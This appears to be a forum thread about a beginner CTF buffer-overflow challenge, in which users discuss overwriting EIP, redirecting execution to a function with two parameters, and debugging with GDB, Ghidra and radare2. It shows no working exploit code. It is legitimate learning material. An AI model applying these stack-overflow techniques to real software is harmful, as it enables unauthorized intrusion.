[pwn] You know 0xDiablos

Got the flag :). Could anyone get this exploit to work in Python 3? I managed to do it with Python 2 in the end, but would’ve liked to do it in Python 3…

I’ve never done a BUF before and im trying to read through assembly docuementiation but I think I have the right idea, ive made a payload to send and have the address I need, but I still get a fault error when sending it.

If someone could pm me a hint or something that would be great. I also dont know where to put variables

Type your comment> @Oscuridad said:

I’ve never done a BUF before and im trying to read through assembly docuementiation but I think I have the right idea, ive made a payload to send and have the address I need, but I still get a fault error when sending it.

If someone could pm me a hint or something that would be great. I also dont know where to put variables

Send me the exploit on discord “Alex Zander#0764”

I’m confused, I’m testing a BOF, and successfully overwriting EIP in a VM, but doing the same on a physical box doesn’t work?

ASLR is off on both…

Same length payload of 'A’s, then 4* ‘B’, and 4* 'C’s.

On the VM : EIP gets ‘BBBB’, with ESP at ‘CCCC’.
On the physical box : EIP gets ‘AAAA’, with ESP at ‘BBBBCCCC’ ?

Environments were NOT the same! Lesson learned. Problem solved.

I am really confused. In Kali VM, using gdb/gef/pwntools after many hours finally got a successful exploit.py (from gef skel) working. But only locally. Remotely I get the 'A’s string echoed back. Playing with the length of those ‘A’ I will get same thing back, or nothing, or connection refused for several minutes.

I do not understand why it would work in VM but not remotely. I cannot imagine that remotely it is not running in a VM or Docker container…

Type your comment> @Baseizo7 said:

I am really confused. In Kali VM, using gdb/gef/pwntools after many hours finally got a successful exploit.py (from gef skel) working. But only locally. Remotely I get the 'A’s string echoed back. Playing with the length of those ‘A’ I will get same thing back, or nothing, or connection refused for several minutes.

I do not understand why it would work in VM but not remotely. I cannot imagine that remotely it is not running in a VM or Docker container…

Never mind! Figured it out. h4x0r error. Apparently I have trouble noticing glaring numerical typos right in front of me for hours.

Hi,
can anybody give me any help, please ?
I have a payload without bad characters and go through gdb+peda but can’t make it work even locally.
Redirect EIP to method with both parameters but still no success.
Thanks.

That was my first buffer overflow and while it may be simple in the realms of BOF, I found that very difficult. Great challenge though and I’ve learned a lot. For other noobs, Ippsec’s Safe video is good place to get a feel for Buffer Overflows as he explains the tools you can use, however the BOF in that video is much more complex than this. LiveOverflow has a Binary Exploitation playlist on YouTube which is where I gained most of my knowledge for reading Assembly and making sense of the outputs I was seeing in Ghidra. He also uses GDB which is a fantastic tool for exploring what’s going on in the binary when it’s running.

My advice for anyone struggling in this challenge or new to BOF is to

  1. Find what you’re looking for in Ghidra
  2. Learn to use GDB
  3. Set some breakpoints in the code
  4. Learn how to read from the memory locations and step through piece by piece.

Not only can it show you what the binary is doing - it shows you what your exploit is doing. In some cases your exploit could just be a few addresses away from working, that’s what happened to me anyway.

I haven’t seen many people plug YT content before, so apologies if this is a spoiler or against the rules.

Just solved it, my first bof without any walkthrough! :smiley:
As mentioned earlier in the thread: use python2!
I had the correct payload at one point but it didn’t work with python3 so i wasted a few hours trying other stuff.
Happy to help if anyone needs a nudge.

I just solved this. I saw a mention to use Python 2 vs. Python 3, but I got my exploit to work in Python3. I only had one line I had to change to make it successfully run in Python 3.

When I try to overwrite eip its substituting the address I want to point to with other random cr*p

I’ve just finished the BOF module on HTB academy but what i’ve learned there doesn’t seem to apply or i’m doing something horribly wrong,

Hi, I’m super new here… I’ve tried this challenge, I can BOF the 1st function… I saw I need to add params for 2nd one… I think I sent them (as I can see their values on registries) but I can’t make it print the answer. I don’t have other ideas, maybe I’m missing something… Could anybody give me an hint?

this challenge is really good I really like especially not to go too fast you risk missing important stages

how can I pass the 2 arguments ?

Type your comment> @ajnik said:

how can I pass the 2 arguments ?

nevermind, got it :slight_smile:

Type your comment> @sebssekk said:

Hi, I’m super new here… I’ve tried this challenge, I can BOF the 1st function… I saw I need to add params for 2nd one… I think I sent them (as I can see their values on registries) but I can’t make it print the answer. I don’t have other ideas, maybe I’m missing something… Could anybody give me an hint?

You can see registers with “info registers” command in gdb or with “dr” command in radare2.
If you add breakpoint and debug then you can see which address the “CMP” operation will look to.If you know how far you must overwrite to reach those addresses, then you’ve done it.

This was an awesome challenge! I am a n00b to binary exploitation, and decided to try popping a shell after getting the flag - which I just did!

It took a lot of effort, but I learned a lot in the process. This challenge was a great learning experience, and I would recommend it to anyone looking to get into reversing or binary exploitation.

Can someone provide me a little nudge. I have it pointing to the correct function and i believe i can set the params but i am struggling to figure out what they need to be.

Type your comment> @keZy said:

Can someone provide me a little nudge. I have it pointing to the correct function and i believe i can set the params but i am struggling to figure out what they need to be.

I’m not sure what disassemblers and debuggers you are using, but I find radare2’s visual graph mode to be very helpful for analyzing control flow. You can get into visual graph mode with the ‘VV’ command (that is two V’s). From there, you can look around a function’s basic blocks with vi-like-controls (‘h/j/k/l’), or using the arrow keys. If you want to exit visual graph mode, you need to type ‘q’ twice - once to exit the mode, and then to exit the hex editor (TBH, I’m not sure why this is).

Assuming you are also using radare as a debugger, you can use it to verify what you think is happening, versus what is actually happening.